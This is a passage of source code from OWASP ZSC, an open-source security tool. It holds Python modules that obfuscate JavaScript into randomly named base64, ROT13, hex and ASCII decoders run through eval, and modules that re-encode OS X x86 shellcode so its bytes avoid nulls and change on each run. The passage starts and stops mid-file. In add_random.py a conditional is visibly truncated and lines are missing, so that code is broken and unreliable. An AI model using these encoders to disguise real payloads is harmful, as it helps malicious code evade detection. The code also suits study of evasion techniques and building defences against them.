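        + color.color('reset'))
start.sig()

--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''

pass

--------------------------------------------------------------------------------
/lib/encoder/__init__.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''

pass
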
--------------------------------------------------------------------------------
/lib/encoder/javascript/__init__.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''

pass

--------------------------------------------------------------------------------
/lib/encoder/javascript/base64.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
import binascii
import random
import string
from core.compatible import version
_version = version()


def encode(f):
    """Return JavaScript that carries *f* base64-encoded and evaluates it.

    The generated script assigns the encoded text to a variable, defines a
    function that decodes its argument with window.atob, and passes the
    decoded text to eval. All identifiers are 50 random ASCII letters drawn
    with the `random` module, so they differ on every call.
    """
    base64_arr = ''  # never read in this function
    val_name = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    data = ''
    if _version is 2:
        data = val_name + ' = "' + str(binascii.b2a_base64(f)).replace(
            '\n', '') + '";'

    if _version is 3:
        # unlike the Python 2 branch, no ';' is appended after the string
        data = val_name + ' = "' + str(binascii.b2a_base64(f.encode(
            'latin-1')).decode('latin-1').replace('\n', '')) + '"'

    var_b64 = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    var_str = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    var_data = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    func_name = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    func_argv = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    # the template is plain text: its shape (long random names, an atob
    # call, a final eval) is the same in every generated file
    f = '''
%s
function %s(%s) {
var %s = %s.toString();
var %s = window.atob(%s)
return %s;
}
%s = %s;
eval(%s(%s));''' % (data, func_name, func_argv, var_b64, func_argv, var_str,
                    var_b64, var_str, var_data, val_name, func_name, var_data)
    return f


def start(content,cli):
    """Return *content* as a comment followed by its encoded form.

    The original source is kept in a leading /* ... */ block (with '*/'
    rewritten to '*_/'), so the cleartext is still readable in the output.
    *cli* is not used here.
    """
    return str(str('/*\n') + str(content.replace('*/', '*_/')) + str('\n*/') +
               str(encode(content)) + str('\n'))

--------------------------------------------------------------------------------
/lib/encoder/javascript/rot13.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
import binascii
import random
import string
import codecs
from core.compatible import version
_version = version()


def encode(f):
    """Return JavaScript that carries *f* ROT13-encoded and evaluates it.

    The encoded text is stored in a template literal under a random
    50-letter name; the generated script defines a fixed helper `rot`, a
    randomly named wrapper around it, and passes the decoded text to eval.
    """
    base64_arr = ''  # never read in this function
    val_name = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    data = ''
    if _version is 2:
        # this branch puts a space after the opening backtick, the Python 3
        # branch does not
        data = val_name + '= ` ' + str(f.encode("rot13")) + '`;'
    if _version is 3:
        data = val_name + '= `' + str(codecs.encode(f, "rot-13")) + '`;'
    # var_b64, var_str and var_data are generated but not used in the
    # template below
    var_b64 = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    var_str = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    var_data = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    func_name = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    func_argv = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    f = '''
%s
function rot(s) {
return s.replace(/[a-zA-Z]/g, function (c) {
return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) + 13) ? c : c - 26);
});
}
function %s(%s) {
return rot(%s);


}
eval(%s(%s));''' % (data, func_name, func_argv, func_argv, func_name, val_name)
    return f


def start(content,cli):
    """Return *content* as a comment followed by its encoded form.

    The original source is kept in a leading /* ... */ block (with '*/'
    rewritten to '*_/'), so the cleartext is still readable in the output.
    *cli* is not used here.
    """
    return str(str('/*\n') + str(content.replace('*/', '*_/')) + str('\n*/') +
               str(encode(content)) + str('\n'))

--------------------------------------------------------------------------------
/lib/encoder/javascript/simple_ascii.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
import random
import string

def encode(f):
    var_name = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    ascii_data = ''.join([str(ord(i))+'*' for i in f])[:-1]
    data = var_name + ' = "' + ascii_data + '"'
    var_data = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    var_counter = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    var_str = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    var_ascii = ''.join(
        random.choice(string.ascii_lowercase + string.ascii_uppercase)
        for i in range(50))
    func_name = ''.join(
random.choice(string.ascii_lowercase + string.ascii_uppercase) 32 | for i in range(50)) 33 | func_argv = ''.join( 34 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 35 | for i in range(50)) 36 | f = ''' 37 | %s 38 | function %s(%s) { 39 | var %s = ''; 40 | var %s = %s.split("*"); 41 | for(var %s = 0; %s < %s.length; %s++){ 42 | %s += String.fromCharCode(%s[%s]); 43 | } 44 | return %s; 45 | } 46 | %s = %s 47 | eval(%s(%s)) 48 | ''' % (data, func_name, func_argv, var_str, var_ascii, func_argv, var_counter, var_counter, var_ascii, var_counter, 49 | var_str, var_ascii, var_counter, var_str, var_data, var_name, func_name, var_data) 50 | return f 51 | 52 | 53 | def start(content,cli): 54 | return str(str('/*\n') + str(content.replace('*/', '*_/')) + str('\n*/') + 55 | str(encode(content)) + str('\n')) 56 | -------------------------------------------------------------------------------- /lib/encoder/javascript/simple_base64_rev.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | import random 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | 15 | 16 | def encode(f): 17 | var_name = ''.join( 18 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 19 | for i in range(50)) 20 | 21 | if _version is 2: 22 | rev_data = binascii.b2a_base64(f)[-2::-1] 23 | data = var_name + ' = "' + str(rev_data) + '"' 24 | if _version is 3: 25 | rev_data = binascii.b2a_base64(f.encode('utf8')).decode('utf8')[-2::-1] 26 | data = var_name + ' = "' + str(rev_data) + '"' 27 | var_b64 = ''.join( 28 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 29 | for i in range(50)) 30 | var_str = 
''.join( 31 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 32 | for i in range(50)) 33 | var_data = ''.join( 34 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 35 | for i in range(50)) 36 | func_name = ''.join( 37 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 38 | for i in range(50)) 39 | func_argv = ''.join( 40 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 41 | for i in range(50)) 42 | f = ''' 43 | %s 44 | function %s(%s) { 45 | var %s = %s.split("").reverse().join(""); 46 | var %s = window.atob(%s) 47 | return %s; 48 | } 49 | %s = %s; 50 | eval(%s(%s));''' % (data, func_name, func_argv, var_b64, func_argv, var_str, 51 | var_b64, var_str, var_data, var_name, func_name, var_data) 52 | return f 53 | 54 | 55 | def start(content,cli): 56 | return str(str('/*\n') + str(content.replace('*/', '*_/')) + str('\n*/') + 57 | str(encode(content)) + str('\n')) 58 | -------------------------------------------------------------------------------- /lib/encoder/javascript/simple_hex.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | import random 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | 15 | 16 | def encode(f): 17 | hex_arr = [] 18 | val_names = [] 19 | data = '' 20 | eval = '' 21 | n = 0 22 | m = 0 23 | for line in f: 24 | if _version is 2: 25 | hex_arr.append(str(binascii.b2a_hex(line))) 26 | if _version is 3: 27 | hex_arr.append(str((binascii.b2a_hex(str(line).encode('latin-1')) 28 | ).decode('latin-1'))) 29 | length = len(hex_arr) 30 | while (length != 0): 31 | val_names.append(''.join(random.choice(string.ascii_lowercase + 32 | 
string.ascii_uppercase) 33 | for i in range(50))) 34 | length -= 1 35 | for hex in hex_arr: 36 | data += val_names[n] + ' = "' + str(hex) + '";\n' 37 | n += 1 38 | while (m <= n - 1): 39 | eval += val_names[m] + '+' 40 | m += 1 41 | var_hex = ''.join( 42 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 43 | for i in range(50)) 44 | var_str = ''.join( 45 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 46 | for i in range(50)) 47 | var_counter = ''.join( 48 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 49 | for i in range(50)) 50 | var_data = ''.join( 51 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 52 | for i in range(50)) 53 | func_name = ''.join( 54 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 55 | for i in range(50)) 56 | func_argv = ''.join( 57 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 58 | for i in range(50)) 59 | f = ''' 60 | %s 61 | function %s(%s) { 62 | var %s = %s.toString(); 63 | var %s = ''; 64 | for (var %s = 0; %s < %s.length; %s += 2) 65 | %s += String.fromCharCode(parseInt(%s.substr(%s, 2), 16)); 66 | return %s; 67 | } 68 | %s = %s; 69 | eval(%s(%s));''' % (data, func_name, func_argv, var_hex, func_argv, var_str, 70 | var_counter, var_counter, var_hex, var_counter, var_str, 71 | var_hex, var_counter, var_str, var_data, eval[:-1], 72 | func_name, var_data) 73 | return f 74 | 75 | 76 | def start(content,cli): 77 | return str(str('/*\n') + str(content.replace('*/', '*_/')) + str('\n*/') + 78 | str(encode(content)) + str('\n')) 79 | -------------------------------------------------------------------------------- /lib/encoder/javascript/simple_hex_rev.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | 
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | import random 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | 15 | 16 | def encode(f): 17 | var_name = ''.join( 18 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 19 | for i in range(50)) 20 | 21 | if _version is 2: 22 | rev_data = binascii.b2a_hex(f)[::-1] 23 | data = var_name + ' = "' + str(rev_data) + '"' 24 | if _version is 3: 25 | rev_data = binascii.b2a_hex(f.encode('utf8')).decode('utf8')[::-1] 26 | data = var_name + ' = "' + str(rev_data) + '"' 27 | var_hex = ''.join( 28 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 29 | for i in range(50)) 30 | var_str = ''.join( 31 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 32 | for i in range(50)) 33 | var_data = ''.join( 34 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 35 | for i in range(50)) 36 | var_counter = ''.join( 37 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 38 | for i in range(50)) 39 | func_name = ''.join( 40 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 41 | for i in range(50)) 42 | func_argv = ''.join( 43 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 44 | for i in range(50)) 45 | f = ''' 46 | %s 47 | function %s(%s) { 48 | var %s = %s.split('').reverse().join(''); 49 | var %s = ''; 50 | for (var %s = 0; %s < %s.length; %s += 2) 51 | %s += String.fromCharCode(parseInt(%s.substr(%s, 2), 16)); 52 | return %s; 53 | } 54 | %s = %s; 55 | eval(%s(%s));''' % (data, func_name, func_argv, var_hex, func_argv, var_str, 56 | var_counter, var_counter, var_hex, var_counter, var_str, 57 | var_hex, var_counter, var_str, var_data, var_name, 58 | func_name, var_data) 59 | return f 60 | 61 | 62 | def start(content,cli): 63 | return str(str('/*\n') + str(content.replace('*/', '*_/')) + str('\n*/') + 64 | str(encode(content)) + str('\n')) 
65 | -------------------------------------------------------------------------------- /lib/encoder/linux_x86/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/encoder/osx_x86/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/encoder/osx_x86/add_random.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random, binascii, string 10 | from core.compatible import version 11 | _version = version() 12 | chars = string.digits + string.ascii_letters 13 | 14 | def start(shellcode, job): 15 | if "exec" == job: 16 | t = True 17 | eax = str('0x3b') 18 | while t: 19 | if _version is 2: 20 | eax_1 = binascii.b2a_hex(''.join(random.choice(chars) 21 | for i in range(1))) 22 | if _version is 3: 23 | eax_1 = (binascii.b2a_hex((''.join(random.choice(chars) for i in range(1))).encode('latin-1'))).decode('latin-1') 24 | eax_1 = str('0') + 
str(eax_1[1]) 25 | eax_2 = "%x" % (int(eax, 16) - int(eax_1, 16)) 26 | if eax > eax_1: 27 | if '00' not in str(eax_1) and '00' not in str(eax_2): 28 | t = False 29 | 30 | A = 0 31 | eax = 'push $%s' % (str(eax)) 32 | if '-' in eax_2: 33 | A = 1 34 | eax_2 = eax_2.replace('-', '') 35 | eax_add = 'push $0x%s\npop %%eax\nneg %%eax\nadd $0x%s,%%eax\n' % (eax_2, eax_1) 36 | 37 | if A is 0: 38 | eax_add = 'push $0x%s\npop %%eax\nadd $0x%s,%%eax\n' % (eax_2,eax_1) 39 | shellcode = shellcode.replace('mov $0x3b,%al', eax_add) 40 | 41 | for line in shellcode.rsplit('\n'): 42 | if 'push' in line and '$0x' in line and ',' not in line and len(line) > 14: 43 | data = line.rsplit('push')[1].rsplit('$0x')[1] 44 | t = True 45 | while t: 46 | if _version is 2: 47 | ebx_1 = binascii.b2a_hex(''.join(random.choice(chars)for i in range(4))) 48 | if _version is 3: 49 | ebx_1 = (binascii.b2a_hex((''.join(random.choice(chars) for i in range(4))).encode('latin-1'))).decode('latin-1') 50 | ebx_2 = "%x" % (int(data, 16) - int(ebx_1, 16)) 51 | if str('00') not in str(ebx_1) and str('00') not in str(ebx_2) and '-' in ebx_2 and len(ebx_2.replace('-', '')) >= 7 and len(ebx_1) >= 7 and '-' not in ebx_1: 52 | ebx_2 = ebx_2.replace('-', '') 53 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nneg %%eax\nadd %%ebx,%%eax\npush %%eax\n' % (str(ebx_1), str(ebx_2)) 54 | shellcode = shellcode.replace(line, command) 55 | t = False 56 | if 'system' == job: 57 | 58 | for line in shellcode.rsplit('\n'): 59 | if 'push' in line and '$0x' in line and ',' not in line and len(line) > 14: 60 | # print(line) 61 | data = line.rsplit('push')[1].rsplit('$0x')[1] 62 | # print(data) 63 | t = True 64 | while t: 65 | if _version is 2: 66 | ebx_1 = binascii.b2a_hex(''.join(random.choice(chars)for i in range(4))) 67 | 68 | if _version is 3: 69 | ebx_1 = (binascii.b2a_hex((''.join(random.choice( 70 | chars) for i in range(4))).encode('latin-1')) 71 | ).decode('latin-1') 72 | if data= 7 and len(ebx_1) >= 7 and '-' 
not in ebx_1: 75 | ebx_2 = ebx_2.replace('-', '') 76 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nneg %%eax\nadd %%ebx,%%eax\npush %%eax\n' % (str(ebx_1), str(ebx_2)) 77 | shellcode = shellcode.replace(line, command) 78 | t = False 79 | return shellcode 80 | -------------------------------------------------------------------------------- /lib/encoder/osx_x86/add_yourvalue.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | def start(type, shellcode, job): 11 | if "exec" == job: 12 | value = str(type.rsplit('add_')[1][2:]) 13 | t = True 14 | eax = str('0x3b909090') 15 | eax_1 = value 16 | eax_2 = "%x" % (int(eax, 16) - int(eax_1, 16)) 17 | A = 0 18 | eax = 'push $%s' % (str(eax)) 19 | if '-' in eax_2: 20 | A = 1 21 | eax_2 = eax_2.replace('-', '') 22 | eax_add = 'push $0x%s\npop %%eax\nneg %%eax\nadd $0x%s,%%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 23 | eax_2, eax_1) 24 | 25 | if A is 0: 26 | eax_add = 'push $0x%s\npop %%eax\nadd $0x%s,%%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 27 | eax_2, eax_1) 28 | shellcode = shellcode.replace('mov $0x3b,%al', eax_add) 29 | A = 0 30 | for line in shellcode.rsplit('\n'): 31 | if '_z3r0d4y_' in line: 32 | A = 1 33 | if 'push' in line and '$0x' in line and ',' not in line and len( 34 | line) > 14 and A is 1: 35 | data = line.rsplit('push')[1].rsplit('$0x')[1] 36 | t = True 37 | while t: 38 | ebx_1 = value 39 | ebx_2 = "%x" % (int(data, 16) - int(ebx_1, 16)) 40 | 41 | if str('00') not in str(ebx_1) and str('00') not in str( 42 | ebx_2) and len(ebx_2) >= 7 and len( 43 | ebx_1) >= 7 and '-' not in ebx_1: 44 | ebx_2 = ebx_2.replace('-', '') 45 | command = '\npush $0x%s\npop %%ebx\npush 
$0x%s\npop %%eax\nadd %%ebx,%%eax\npush %%eax\n' % ( 46 | str(ebx_1), str(ebx_2)) 47 | shellcode = shellcode.replace(line, command) 48 | t = False 49 | shellcode = shellcode.replace('_z3r0d4y_', '') 50 | 51 | if "system" == job: 52 | value = str(type.rsplit('add_')[1][2:]) 53 | 54 | for line in shellcode.rsplit('\n'): 55 | if 'push' in line and '$0x' in line and ',' not in line and len( 56 | line) > 14: 57 | data = line.rsplit('push')[1].rsplit('$0x')[1] 58 | ebx_1 = value 59 | ebx_2 = "%x" % (int(data, 16) - int(ebx_1, 16)) 60 | A = 0 61 | if str('-') in str(ebx_2): 62 | ebx_2 = ebx_2.replace('-', '') 63 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nneg %%eax\nadd %%ebx,%%eax\npush %%eax\n' % ( 64 | str(ebx_1), str(ebx_2)) 65 | A = 1 66 | if A is 0: 67 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nadd %%ebx,%%eax\npush %%eax\n' % ( 68 | str(ebx_1), str(ebx_2)) 69 | shellcode = shellcode.replace(line, command) 70 | 71 | 72 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/osx_x86/dec.py: -------------------------------------------------------------------------------- 1 | def start(shellcode, job): 2 | if "exec" == job: 3 | t = True 4 | eax = str('0x3b909090') 5 | eax_2 = "%x" % (int(eax, 16) + int('0x01', 16)) 6 | A = 0 7 | eax = 'push $%s' % (str(eax)) 8 | if '-' in eax_2: 9 | A = 1 10 | eax_2 = eax_2.replace('-', '') 11 | eax_add = 'push $0x%s\npop %%eax\ndec %%eax\nneg %%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 12 | eax_2) 13 | 14 | if A is 0: 15 | eax_add = 'push $0x%s\npop %%eax\ndec %%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 16 | eax_2) 17 | shellcode = shellcode.replace('mov $0x3b,%al', eax_add) 18 | 19 | A = 0 20 | for line in shellcode.rsplit('\n'): 21 | if '_z3r0d4y_' in line: 22 | A = 1 23 | if 'push' in line and '$0x' in line and ',' not in line and len( 24 | line) > 14 and A is 1: 25 | data = line.rsplit('push')[1].rsplit('$0x')[1] 26 
| ebx_2 = "%x" % (int(data, 16) + int('0x01', 16)) 27 | command = '\npush $0x%s\npop %%ebx\ndec %%ebx\npush %%ebx\n' % ( 28 | str(ebx_2)) 29 | shellcode = shellcode.replace(line, command) 30 | shellcode = shellcode.replace('_z3r0d4y_', '') 31 | 32 | if "system" == job: 33 | for line in shellcode.rsplit('\n'): 34 | if 'push' in line and '$0x' in line and ',' not in line and len( 35 | line) > 14: 36 | data = line.rsplit('push')[1].rsplit('$0x')[1] 37 | ebx_2 = "%x" % (int(data, 16) + int('01', 16)) 38 | command = '\npush $0x%s\npop %%eax\ndec %%eax\npush %%eax\n' % (str(ebx_2)) 39 | shellcode = shellcode.replace(line, command) 40 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/osx_x86/dec_timesyouwant.py: -------------------------------------------------------------------------------- 1 | def start(type, shellcode, job): 2 | if "exec" == job: 3 | times = int(type.rsplit('dec_')[1]) 4 | t = True 5 | eax_2, eax = str('0x3b909090'), str('0x3b909090') 6 | n = 0 7 | while n < times: 8 | eax_2 = "%x" % (int(eax_2, 16) + int('0x01', 16)) 9 | n += 1 10 | dec = 'dec %eax\n' * n 11 | A = 0 12 | eax = 'push $%s' % (str(eax)) 13 | if '-' in eax_2: 14 | A = 1 15 | eax_2 = eax_2.replace('-', '') 16 | eax_add = 'push $0x%s\npop %%eax\n%s\nneg %%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 17 | eax_2, dec) 18 | 19 | if A is 0: 20 | eax_add = 'push $0x%s\npop %%eax\n%s\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 21 | eax_2, dec) 22 | shellcode = shellcode.replace('mov $0x3b,%al', eax_add) 23 | 24 | A = 0 25 | for line in shellcode.rsplit('\n'): 26 | if '_z3r0d4y_' in line: 27 | A = 1 28 | if 'push' in line and '$0x' in line and ',' not in line and len( 29 | line) > 14 and A is 1: 30 | ebx_2 = line.rsplit('push')[1].rsplit('$0x')[1] 31 | n = 0 32 | while n < times: 33 | ebx_2 = "%x" % (int(ebx_2, 16) + int('0x01', 16)) 34 | n += 1 35 | dec = 'dec %ebx\n' * n 36 | command = '\npush $0x%s\npop 
%%ebx\n%s\npush %%ebx\n' % ( 37 | str(ebx_2), dec) 38 | shellcode = shellcode.replace(line, command) 39 | shellcode = shellcode.replace('_z3r0d4y_', '') 40 | if "system" == job: 41 | times = int(type.rsplit('dec_')[1]) 42 | for line in shellcode.rsplit('\n'): 43 | if 'push' in line and '$0x' in line and ',' not in line and len( 44 | line) > 14: 45 | ebx_2 = line.rsplit('push')[1].rsplit('$0x')[1] 46 | n = 0 47 | while n < times: 48 | ebx_2 = "%x" % (int(ebx_2, 16) + int('01', 16)) 49 | n += 1 50 | dec = 'dec %eax\n' * n 51 | command = '\npush $0x%s\npop %%eax\n%spush %%eax\n' % ( 52 | str(ebx_2), str(dec)) 53 | shellcode = shellcode.replace(line, command) 54 | 55 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/osx_x86/inc.py: -------------------------------------------------------------------------------- 1 | def start(shellcode, job): 2 | if job == "exec": 3 | t = True 4 | eax = str('0x3b909090') 5 | eax_2 = "%x" % (int(eax, 16) - int('0x01', 16)) 6 | A = 0 7 | eax = 'push $%s' % (str(eax)) 8 | if '-' in eax_2: 9 | A = 1 10 | eax_2 = eax_2.replace('-', '') 11 | eax_add = 'push $0x%s\npop %%eax\ninc %%eax\nneg %%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 12 | eax_2) 13 | 14 | if A is 0: 15 | eax_add = 'push $0x%s\npop %%eax\ninc %%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 16 | eax_2) 17 | shellcode = shellcode.replace('mov $0x3b,%al', eax_add) 18 | 19 | A = 0 20 | for line in shellcode.rsplit('\n'): 21 | if '_z3r0d4y_' in line: 22 | A = 1 23 | if 'push' in line and '$0x' in line and ',' not in line and len( 24 | line) > 14 and A is 1: 25 | data = line.rsplit('push')[1].rsplit('$0x')[1] 26 | ebx_2 = "%x" % (int(data, 16) - int('0x01', 16)) 27 | command = '\npush $0x%s\npop %%ebx\ninc %%ebx\npush %%ebx\n' % ( 28 | str(ebx_2)) 29 | shellcode = shellcode.replace(line, command) 30 | shellcode = shellcode.replace('_z3r0d4y_', '') 31 | if job == "system": 32 | for line in 
shellcode.rsplit('\n'): 33 | if 'push' in line and '$0x' in line and ',' not in line and len( 34 | line) > 14: 35 | data = line.rsplit('push')[1].rsplit('$0x')[1] 36 | ebx_2 = "%x" % (int(data, 16) - int('01', 16)) 37 | command = '\npush $0x%s\npop %%eax\ninc %%eax\npush %%eax\n' % ( 38 | str(ebx_2)) 39 | shellcode = shellcode.replace(line, command) 40 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/osx_x86/inc_timesyouwant.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | 11 | def start(type, shellcode, job): 12 | if "exec" == job: 13 | times = int(type.rsplit('inc_')[1]) 14 | t = True 15 | eax_2, eax = str('0x3b909090'), str('0x3b909090') 16 | n = 0 17 | while n < times: 18 | eax_2 = "%x" % (int(eax_2, 16) - int('0x01', 16)) 19 | n += 1 20 | inc = 'inc %eax\n' * n 21 | A = 0 22 | eax = 'push $%s' % (str(eax)) 23 | if '-' in eax_2: 24 | A = 1 25 | eax_2 = eax_2.replace('-', '') 26 | eax_add = 'push $0x%s\npop %%eax\n%s\nneg %%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 27 | eax_2, inc) 28 | 29 | if A is 0: 30 | eax_add = 'push $0x%s\npop %%eax\n%s\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 31 | eax_2, inc) 32 | shellcode = shellcode.replace('mov $0x3b,%al', eax_add) 33 | 34 | A = 0 35 | for line in shellcode.rsplit('\n'): 36 | if '_z3r0d4y_' in line: 37 | A = 1 38 | if 'push' in line and '$0x' in line and ',' not in line and len( 39 | line) > 14 and A is 1: 40 | ebx_2 = line.rsplit('push')[1].rsplit('$0x')[1] 41 | n = 0 42 | while n < times: 43 | ebx_2 = "%x" % (int(ebx_2, 16) - int('0x01', 16)) 44 | n += 1 45 | inc = 'inc %ebx\n' * n 46 | command = '\npush 